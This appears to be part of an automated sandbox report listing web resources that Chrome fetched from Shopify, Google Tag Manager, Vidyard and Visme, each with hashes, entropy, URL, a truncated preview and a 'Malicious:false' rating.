                                                                    Preview:wOF2...................+...........................X....`..`..0.~..s..... ..N.....6.$..(. .....5...[~....m;.iA.7..o.k.)...`.[..Xy.%..m)...Dg.. ....?7...K.j.x.~..p7...U.T.=...%..&.!E...E-h.*d...U.!.Lhj..%..3....T.6.........M..R...O../.C.Qn..F=.....im...N}....l..Le?.O.}#......_......3..5..N.%..6...Tf.h.....,.L..3u..;..>..b..*.?Ue..p.|...,....e..)DtK......m._..f.R...=w.......2.e...e.K2.#W........sn..`..,..v...O..zC..H.d.d. ;1..z.Wi.(.S..t.z-.p..;..c...........H......`DM..r.M|.Q.F...T..?......6b$..:..#......?.>...).<`.K...J...0..~........Ge.4u....O.W....W....}%.)...b.....Y.f..aO.+.mM.6tN.Z...(.)f........K....o*@'j.,..J.T..KbD|...2wz.G......c.../........{..._7+....(V...S.Q..:...@..P..y$K.,.h.t....{........Om....3.;.c%....Vjo".a..d....p*e..G.}=....B..mlpJ..1W{wE.\S...(........bktR.....rrrrR.T*.........H$....gg.;.]y.$I.|N.....]..?.B.T$4`..X.....e.O.........<..........s.Q.}....Z..d..(;~9bX.=..]y.9ko...[......=.L...P.P]..Nj....o....H..ax)......
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (34114)
                                                                    Category:downloaded
                                                                    Size (bytes):368353
                                                                    Entropy (8bit):5.569247756575003
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C9737D561E5C2F4D700C7FE480E811A9
                                                                    SHA1:695301171E13E44622FA1D52286EA5588CBA9922
                                                                    SHA-256:002FF1A546D303F473885D65CA91E336CADC4AE3808A807EC03573D31F2F38FB
                                                                    SHA-512:88C048CEA09D22D379E970BD6C67360FC890B1BB2B1364E848EE8714285F6E1743433CA06CE5632FD91A57C5F082DCBA42BB3EA3B97CA3997BAAEE7ADA0FAAEA
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://www.googletagmanager.com/gtm.js?id=GTM-TZ26LP8&dl=dataLayer
                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"176",. . "macros":[{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"event_name"},{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"event_category"},{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"event_action"},{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"event_label"},{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"event_value"},{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"event_non_interaction"},{"function":"__k","vtp_decodeCookie":true,"vtp_name":"_shopify_y"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":fal
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):7783
                                                                    Entropy (8bit):4.032437077184371
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:62C82332FCC9E4DF60FF570DEB675D3E
                                                                    SHA1:E280D34426ED5D5C5CA47BD04368E8A942DB2CA6
                                                                    SHA-256:70E8F453CE0B410F5A52F1032CD1EFB17214E3F245921D679FBF3EB83D018814
                                                                    SHA-512:4439CFF402A800A75042371C153E41E041ED5ADB512B20FD95B82CE712A07FDC10180772AC4BD5949FAE63D9952787E7E114E2091486C838B6A191451A73A6B3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/62c82332fcc9e4df60ff570deb675d3e.svgz
                                                                    Preview:<svg width="143" height="65" viewBox="0 0 143 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="141" height="63" rx="7.79" fill="white"/>.<path d="M55.1423 45.0065C54.2416 45.0065 53.4263 45.0065 52.573 45.0065C52.573 44.8453 52.573 44.6936 52.573 44.5514C52.573 40.5884 52.573 36.6254 52.5635 32.6625C52.5635 29.4485 54.5924 26.8886 57.6642 26.2344C61.2764 25.457 64.8601 28.1117 65.2394 31.7713C65.5807 35.099 63.2579 38.3036 59.6741 38.7302C58.1951 38.9103 56.8109 38.5975 55.55 37.8011C55.4457 37.7347 55.3414 37.6683 55.2371 37.602C55.2276 37.5925 55.2181 37.602 55.1423 37.5925C55.1423 40.048 55.1423 42.5131 55.1423 45.0065ZM55.1518 32.4539C55.0949 34.3595 56.7445 36.2841 59.0674 36.2083C61.0963 36.1419 62.7649 34.388 62.7175 32.397C62.6701 30.2259 60.9161 28.5762 58.745 28.6426C56.754 28.7089 55.0854 30.4819 55.1518 32.4539ZM51.3879 38.7112C50.5251 38.7112 49.7098 38.7112 48.8565 38.7112C48.8565 38.332 48.8565 37.9622 48.8565 37.5356C47.1215 38.7112 45.2917 3
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                    Category:downloaded
                                                                    Size (bytes):42
                                                                    Entropy (8bit):2.9881439641616536
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://adservice.google.com/ddm/fls/z/src=9321158;type=shopi0;cat=shopi0;ord=750658982;gtm=45j91e43q1v877474166z89102563954z9862613069za200;dc_pre=1;match_id=526b39d2-2b31-4728-a96e-cdd188321315;dma=0;npa=0;gcs=G1--;gcd=13l3l3l3l5;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;auiddc=*;em=tv.*;s3p=1;~oref=https%3A%2F%2Fwww.shopify.com%2F
                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (408)
                                                                    Category:downloaded
                                                                    Size (bytes):409
                                                                    Entropy (8bit):4.9354627012874035
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:5E3D10F98064D31F1B41C7CB041272B4
                                                                    SHA1:411EDC4191F504A9B6A3069EFAC41935CB511689
                                                                    SHA-256:49B371DE11BF4FD2EA78DDF0A151256B2C03C5D5109B0D99446438DA57082AA9
                                                                    SHA-512:6ED727D4CB4C8D4B1C0AA53F974B055C20BF64C745141A154F8AD135F75AC6A83D1C27FDAC93615AC90FA858F99A000CA287FC2B32C91B8B2575417EB3AF25CA
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/Play-HCYSXFZ7.js
                                                                    Preview:import{a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-VODLJLRC.js";import"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";export{a as default};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (10574)
                                                                    Category:downloaded
                                                                    Size (bytes):254810
                                                                    Entropy (8bit):5.568896771697877
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E7C1B8D18E6143426E1B0102588EC58F
                                                                    SHA1:A47A524192624A7FF2C96AC8F10926F4F4CD50D6
                                                                    SHA-256:083F3DAC6FDAB0BDE3917BAACDD87BF6A10918BE4E51C2CDE2BD2305CD28432A
                                                                    SHA-512:22DAA84BFE4784CC8652EE7CD155639685816DF5D009863C42B1DCA2EC235260A1B8C9FB82D8F7607554E3F9E5C7C079305BBA73911E1DB6F6300317DF7DA188
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.vidyard.com/play/js/player-pomo-46eca7ea3ed985164a8e3c8c9eefb8a3.js
                                                                    Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[19],{1152:./*!*********************************************************************!*\. !*** ../player/components/fullscreenWrapper/FullscreenWrapper.scss ***!. \*********************************************************************/./*! no static exports found */./*! exports used: fullscreenWrapper */./*! ModuleConcatenation bailout: Module is not an ECMAScript module */function(e,t,n){e.exports={fullscreenWrapper:"_29Gjr"}},1153:./*!*************************************************!*\. !*** ../player/components/spinner/Spinner.scss ***!. \*************************************************/./*! no static exports found */./*! exports used: show, spinner */./*! ModuleConcatenation bailout: Module is not an ECMAScript module */function(e,t,n){e.exports={spinner:"giifV",spin:"_3pWeg",highlight:"_1Nluf",show:"_20Z54"}},1154:./*!*******************************************!*\. !*** ../player/components/icon/Icon.scss ***!. \***********
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):2197
                                                                    Entropy (8bit):4.9159776577473355
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:29A20784F322B566E3F71EBB2BF9D6BB
                                                                    SHA1:D9F8289BE0655B67CEEC4523AF66A66DAC9EE9C5
                                                                    SHA-256:FE63F777AD77DE6D33F90E2D7A8D6023E2F8C6F14C14CF1E4261AD180F1AD666
                                                                    SHA-512:D527AD9994C650E56EA2CFE06FB2007342D8B9F9FF11BEA0B312BB05E9199756159FA2D0AC354F76B40F5B8ABC788AAC53B139A0674EDB94F3A466E8C3749BA6
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/29a20784f322b566e3f71ebb2bf9d6bb.svgz
                                                                    Preview:<svg width="135" height="65" viewBox="0 0 135 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="133" height="63" rx="7.79" fill="white"/>.<g clip-path="url(#clip0_1549_7158)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M42.4566 27.8073C41.5293 24.1369 38.5787 22 34.3044 22C29.3857 22 24.999 25.3976 24.999 31.8064C24.999 38.2176 29.3851 41.6152 34.3044 41.6152C38.5781 41.6152 41.5293 39.4784 42.4566 35.8079L39.1684 34.9859C38.4087 36.9296 37.0315 38.3264 34.3044 38.3264C31.2682 38.3264 28.7093 36.246 28.7093 31.8064C28.7093 27.3686 31.2682 25.2864 34.3044 25.2864C37.0315 25.2864 38.4087 26.6851 39.1684 28.6294L42.4566 27.8073ZM46.6988 22.2181V41.3971H58.7028V38.1083H50.355V22.2181H46.6988ZM76.3987 22.2181H72.7413V34.1638C72.7413 36.9575 71.5347 38.327 69.0596 38.327C66.5869 38.327 65.3773 36.9575 65.3773 34.1638V22.2181H61.7229V34.1091C61.7229 39.2329 64.7573 41.6152 69.0596 41.6152C73.3613 41.6152 76.3981 39.2329 76.3981 34.1091V22.2181H76.3987ZM92.331
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 11020, version 1.0
                                                                    Category:downloaded
                                                                    Size (bytes):11020
                                                                    Entropy (8bit):7.9814060548652614
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:A59072F933169D3F2DB497F44CA4CBBE
                                                                    SHA1:5789E81A66958AABC7590C1DDD41058335636027
                                                                    SHA-256:0D9FD7CCABDE9B202DE45EE6B65878CE9594975D8E8810B0878D3F3FA3637D0E
                                                                    SHA-512:127525E8C8CD9BD71126EA6ACF26F79285D0FD83C3E8DC0544919C71B538A961137E65B54ECB0A95B0B8C566270A92D33642608BE9473A9600175484419031A7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.visme.co/fonts/fonts/Roboto-Bold.woff2
                                                                    Preview:wOF2......+.......T...*..........................d.....|.`..l....H.U..r..6.$..`. ..~. ."FE.....ox.FQ.8...lP......jw.u..Hj..3s+...h=..:..C.I.....lq. ..|v...b..4OM.|....|.......6.G........b.Q#.....F.H......%..$l$...;O.O........r.b*..N."}.hl.C.0...p.\.m.E......?z.n+!.~dA..a..$...kNr.....=..f....C.~}..~......E.j.8B...1.8....k_..z.T2C...D....%B&$......_..}.m......q...9.Pq....jfj....\!......x|..\....|,.0+L..p..t.........U.....U..s?....m..r...Hv,.........P....NX97...R..>".B.Yi.N...F...W....<k.\...."v..[.V.e.9.1r.~.....0....(..2.....,."S&D.l...D.....!:tC...... .....@$C..Sg....s..+9..2wLp8.l..H....;;...........<.....B.:.`....d..b].&`..p9 .cA..........H.(...P.V..I.....=.5...0.-......s.u..d+..f..0..p...n....k...:.(uZ....C`..1.d6.8r......o.j.S_..0i.5..p.-..q.=O<..s.^Z.h.5.6l.d.7..../..n. .``.#.^.....:.l..7.)....7..............#.2..S..44.........U...oy.|....,..2.l..'.....6_.o}..b..).j.@...9s..5..2.6...K....|2<I.n..t...^...6Rf.8.(.....fD..../. ..vq.....
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (492)
                                                                    Category:downloaded
                                                                    Size (bytes):493
                                                                    Entropy (8bit):5.298998014383349
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:79FC5C5BC477D5E0A9BDD5F3D9AE6E92
                                                                    SHA1:E78FC7FF1EE7297986E1E640AC5DBE7DB7779AC2
                                                                    SHA-256:0CC7BDE58D78036979626C3A490648FBC3349845C059B3E0580D2F94A78318D8
                                                                    SHA-512:C61CA6CC506D1EAAB18B0BD5466BE27CC7235D65664F0B358636869264BE85CB9902E23251D038ACEA666A52F1A04AAD7DC764F4F776005551C26E8BBA1F4221
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-R4YRRLCT.js
                                                                    Preview:import{a as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var o=r(t()),s=e=>(0,o.jsxs)("svg",{viewBox:"0 0 36 36",...e,children:[(0,o.jsx)("path",{d:"M9 4V32",stroke:"currentColor",strokeWidth:"4",strokeLinecap:"round"}),(0,o.jsx)("path",{d:"M27 4V32",stroke:"currentColor",strokeWidth:"4",strokeLinecap:"round"})]}),p=s;export{p as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):5690
                                                                    Entropy (8bit):4.229638719243241
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:04F205245F06D35F87B53D2EE1BA5969
                                                                    SHA1:2949B4F10B64E0BB55847F30E5BD6307A2FD3B0E
                                                                    SHA-256:A6E7C2CDD2B9A27338C4D2488240C07C9221BD65D0D0D585DE2E4220F68CD4CB
                                                                    SHA-512:FE155D02F142DAF94071CEA7F212DC50EACFE9545267E0F6FACE80C03FCDD8631E5B1163D4D1CEEDB3FA2026FB97F9D32C48DB85B530700971107BF0DDF644DF
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="119" height="63" viewBox="0 0 119 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="118" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1303_6169)"/>.<path d="M31.9434 20.2252C31.9434 20.2252 35.235 20.1916 36.7464 20.2252C38.0563 20.242 38.8288 21.1992 38.4762 22.3748C38.3754 22.6938 38.0899 22.9625 37.8548 23.2816C37.8884 23.3152 37.9891 23.3992 38.0899 23.4496C38.7784 23.8022 38.9464 24.4068 38.896 25.1121C38.8288 25.8846 38.4258 26.3717 37.7036 26.5564C37.3678 26.6404 37.0151 26.7075 36.6624 26.7075C35.2014 26.7243 31.9602 26.7075 31.9602 26.7075L31.9434 20.2252ZM34.9495 26.0694C34.9495 26.0862 34.9495 26.0862 34.9495 26.0694C35.2686 26.0694 35.5876 26.0862 35.8899 26.0694C36.3266 26.0526 36.7968 26.0526 37.2166 25.9518C37.7708 25.8007 38.0731 25.2969 38.0227 24.7427C37.9891 24.2221 37.6365 23.8526 37.0823 23.735C36.8808 23.6847 36.6624 23.6511 36.4609 23.6511C35.3693 23.6343 32.8335 23.6343 32.8335 23.6343V26.0694C32.816
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (45332)
                                                                    Category:downloaded
                                                                    Size (bytes):69250
                                                                    Entropy (8bit):5.484995221286232
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:3323382BC0958AC1BE78373BAA08068E
                                                                    SHA1:ECD198A4C53AE74A039D88840BBCAB2201C65D81
                                                                    SHA-256:719603B678A9A77DA304DC5C304335A46AE87308EBF0F3B58D65177C45E9E316
                                                                    SHA-512:3389DDF445A737DAA9E1D64DF36678457BE826DEFA9A9D3979F2A416CF71C45B62C7FEE13B0E22439E3331B06521FE4F23ADEC57831872B8149E468D5DA7C4A2
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-2IKKNHFG.js
                                                                    Preview:import{a as ve}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{c as pe,e as Be}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var wt=pe(yt=>{"use strict";var te=ve();function So(e,t){return e===t&&(e!==0||1/e===1/t)||e!==e&&t!==t}var Eo=typeof Object.is=="function"?Object.is:So,Po=te.useState,Io=te.useEffect,Lo=te.useLayoutEffect,jo=te.useDebugValue;function Oo(e,t){var n=t(),r=Po({inst:{value:n,getSnapshot:t}}),o=r[0].inst,i=r[1];return Lo(function(){o.value=n,o.getSnapshot=t,Ge(o)&&i({inst:o})},[e,n,t]),Io(function(){return Ge(o)&&i({inst:o}),e(function(){Ge(o)&&i({inst:o})})},[e]),jo(n),n}function Ge(e){var t=e.getSnapshot;e=e.value;try{var n=t();return!Eo(e,n)}catch{return!0}}function Do(e,t){return t()}var Bo=typeof window>"u"||typeof window.document>"u"||typeof window.document.createElement>"u"?Do:Oo;yt.useSyncExternalStore=te.useSyncExternalStore!==void 0?te.useSyncExternalStore:Bo}
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):24347
                                                                    Entropy (8bit):3.8958498453567674
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:CD55DAD309F3F66EB1B1FD5D6642E0F5
                                                                    SHA1:301CEE7563E2A525AC4443A745AE336DAE03D0A5
                                                                    SHA-256:8AA3F0D78FE51B96404CC9E24B2652B222CCECF19F1DE6719AB10F5385EDC531
                                                                    SHA-512:E732828ABC97FF7A3E0190B6776EDEEE89B432B39E0978680F94AA9E6A8A18C4B185832ED3107C7958A013D6F38768131B72AFB6A03AC94023A45E3D6BBD4EDB
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="181" height="63" viewBox="0 0 181 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="180" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1296_6211)"/>.<g clip-path="url(#clip0_1296_6211)">.<path d="M27.8059 27.9435H24.2647C23.4216 27.9435 23 28.4326 23 29.4106V39.0224C23 40.0004 23.4216 40.4894 24.2647 40.4894H27.8059C28.649 40.4894 29.0706 40.0004 29.0706 39.0224V36.1894H27.6035V38.9718H24.5176V29.4612H27.6035V31.8894H29.0706V29.4106C29.0706 28.4326 28.649 27.9435 27.8059 27.9435ZM36.3047 38.8706L32.9659 38.9718V27.9435H31.4988V39.1741C31.4988 40.1184 31.9035 40.5737 32.7129 40.54L34.4835 40.3882L36.2541 40.1353V40.4894H37.7212V27.9435H36.3047V38.8706ZM40.3012 40.4894H41.7682V20.3553H40.3012V40.4894ZM46.3212 24.0482H44.8541V27.9435H43.5388V29.4612H44.8541V39.0224C44.8541 40.0004 45.2757 40.4894 46.1188 40.4894H48.2435V38.9718H46.3212V29.4612H48.2435V27.9435H46.3212V24.0482ZM54.9212 38.8706L51.5824 38.9718V27.9435H50.1153V39.1
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):4314
                                                                    Entropy (8bit):4.428866298086426
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:99655287608AE75A0AFC5B3CF27ACE73
                                                                    SHA1:C8BE672681A5AAE584A5ECF95C8F1328DA63FD73
                                                                    SHA-256:F2EC86BBD205F962D2D29169F1ECD151B130BC1FE2447CA80ED976DEC78AC121
                                                                    SHA-512:F28BDC8C950E909C44B04531A7986FD23EA0ECFED7CADE2DA125391A953618714D04674E2ADACE6A292F752F215B003262AF66D890CED793F1765652369E04DD
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/99655287608ae75a0afc5b3cf27ace73.svgz
                                                                    Preview:<svg width="142" height="65" viewBox="0 0 142 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="140" height="63" rx="7.79" fill="white"/>.<g clip-path="url(#clip0_1549_7235)">.<path d="M30.2804 41.8077H39.1491V43.9562H26V21.4467L28.1294 20.4178L28.9913 20H30.2804V41.8077ZM57.2732 37.365L58.6005 37.9045C57.7889 40.7 55.3276 42.8772 52.6157 43.844C49.4764 44.9804 45.7618 44.109 43.3483 41.9342C41.6723 40.4621 40.7011 38.347 40.6769 36.1164C40.6316 32.3732 42.5629 28.8114 46.0578 27.379C48.1085 26.4862 51.0257 26.4241 53.1361 27.2549C55.9865 28.3029 58.166 30.9385 58.0849 34.0013H44.4775C44.4488 37.6968 46.7692 41.5427 50.7464 41.5093C53.3485 41.5093 56.3064 40.0172 57.2159 37.5225C57.2159 37.5225 56.7958 38.6207 57.2732 37.365ZM48.679 28.2098C46.4684 28.2098 44.7162 30.2103 44.5109 32.3446L53.2316 32.3589C53.1958 29.9716 51.0042 28.1645 48.679 28.2098ZM94.1279 35.8252C92.0366 34.1684 89.0859 33.6337 86.818 32.3231C83.7432 30.4849 85.5504 28.0069 88.5775 28.0809
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1557)
                                                                    Category:downloaded
                                                                    Size (bytes):1558
                                                                    Entropy (8bit):5.3027017834965955
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:6C41A69A5EED40298616054B0B5086D0
                                                                    SHA1:B164FE6C2F0B7C60B70734A996A0569CD8D2E2B2
                                                                    SHA-256:512C1A2725C5632D3AE0B2B316E8D41673FCF0E15FE7A3C395106D0886B6976A
                                                                    SHA-512:3AC86766A4B5C099D574BBAFB81159C35DB8E0B825AEE44C6F6B53E133716690039DA8D41583DD488E7C1DC4FCE1FE758524FA4AC9D0E20A21A2F8A2C9433E71
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-AEETYEVW.js
                                                                    Preview:import{a as p}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XBULFQFZ.js";import{a as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-IK3X57EU.js";import{b as c}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-O6AAYXW4.js";import{b as l}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as i}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var o=i(r()),M=c("grid gap-y-2xl grid-cols-full",{variants:{bottomSpacing:{xl:"pb-xl","2xl":"pb-2xl","4xl":"pb-4xl",none:"pb-0"},mode:{light:"bg-section-light-bg text-section-light-text",dark:"bg-section-dark-bg text-section-dark-text"},topSpacing:{xl:"pt-xl","2xl":"pt-2xl","4xl":"pt-4xl",none:"pt-0"}},defaultVariants:{bottomSpacing:"4xl",mode:"light",topS
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):16
                                                                    Entropy (8bit):3.875
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                    SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                    SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                    SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAn7kd7jIXCEZxIFDZFhlU4=?alt=proto
                                                                    Preview:CgkKBw2RYZVOGgA=
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 362 x 414, 8-bit colormap, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):51723
                                                                    Entropy (8bit):7.976845122657484
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E7344D25E1BB36E00B1EF09B5D273C50
                                                                    SHA1:69B135EBEC0044BBAB2D89D796FDC51722ABE331
                                                                    SHA-256:6860735DD8C29EBFED1B8C0BBBE404B0069DDBACE82401FC5E9F1180F8F7F71B
                                                                    SHA-512:27D212CC15B6F9DEC8F2FA9CC7C24577F04E74ECC206D7EA3046DF2298CF4A4FF9E7BC7371033B549C767EFD253BC51B837DB2F1BD923EC3DA9E5E7ABA3F7EF3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:.PNG........IHDR...j................$eXIfII*.......<...............imagery4..'=......PLTE.............................................GpL............................................................................................................................M@...*05.......+..........,27...............................59.........).....................................................28?...(.2.......rc.........)..7.o......2.j......................N...]..>.w....q...{..jc....................r........F..U.............].....6..?..c.............K?...N...X........q..w..D...............-.........-...D.....O..T...ob-......C.},..........kw}.8..0....\L.....0#.k........=..5<TMQ`|......E......."g......."W............. u..bT@qh.......J;T......`.....S.......q%..2T.5D......n.....b...>5_%.md....6t.}..L.0]SF..r.q..........uq..fG......v......tRNS................._ ..............................................................................................................
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):10833
                                                                    Entropy (8bit):3.9368357873471687
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:4A49A74DF0056108B39F9F8657ED3A85
                                                                    SHA1:6794BE8F936406F10EF4450EBCE477B7F271D9AE
                                                                    SHA-256:0D0BED9B794EDBAD7F9F120E58CD320118E33AE6FE830ED39C0974D4296348F3
                                                                    SHA-512:EA2ECD2632B31BE67430B3A98F9CF7698F1E03697FF3C683B1E9F2B852EEF6BC020C03313EBA2C000285541CF3170A8B4242D1C3A3AD79B45A1BE9EDFF04A385
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="181" height="63" viewBox="0 0 181 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="180" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1296_6186)"/>.<path d="M37.5663 31.6471C37.5773 31.6416 37.5828 31.6416 37.5883 31.6416C37.5993 31.6416 37.6158 31.6361 37.6268 31.6361C38.6938 31.6361 39.7607 31.6361 40.8332 31.6361C40.8607 31.6361 40.8882 31.6361 40.9157 31.6416C40.9212 31.6416 40.9267 31.6416 40.9267 31.6471C40.9322 31.6471 40.9377 31.6526 40.9377 31.6526C40.9432 31.6581 40.9432 31.6581 40.9487 31.6636C40.9542 31.6691 40.9542 31.6691 40.9597 31.6746C40.9652 31.6801 40.9707 31.6911 40.9762 31.6966C42.5216 34.276 44.0671 36.8554 45.6125 39.4293C45.6235 39.4458 45.629 39.4623 45.64 39.4788C45.6455 39.4843 45.651 39.4953 45.6565 39.5008C45.662 39.5063 45.6675 39.5173 45.673 39.5228C45.673 39.5283 45.6785 39.5283 45.684 39.5338C45.6895 39.5338 45.6895 39.5393 45.706 39.5448C45.9865 39.5448 46.2835 39.5448 46.575 39.5448C46.591
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (27448)
